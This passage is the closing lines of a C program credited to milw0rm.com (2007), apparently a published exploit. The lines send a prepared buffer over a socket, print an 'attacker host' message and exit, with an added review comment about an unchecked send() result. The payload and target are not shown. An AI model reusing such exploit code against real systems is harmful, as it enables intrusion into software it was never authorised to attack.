		/* NOTE(review): send() may write fewer than i bytes; result ignored */
		send(sock,do_ex,i,0);
	}
	close(sock);
	printf("** attacker host, check it up, now!\n**\n*/\n");	
	exit(0);
}

/* eox */

// milw0rm.com [2007-05-02]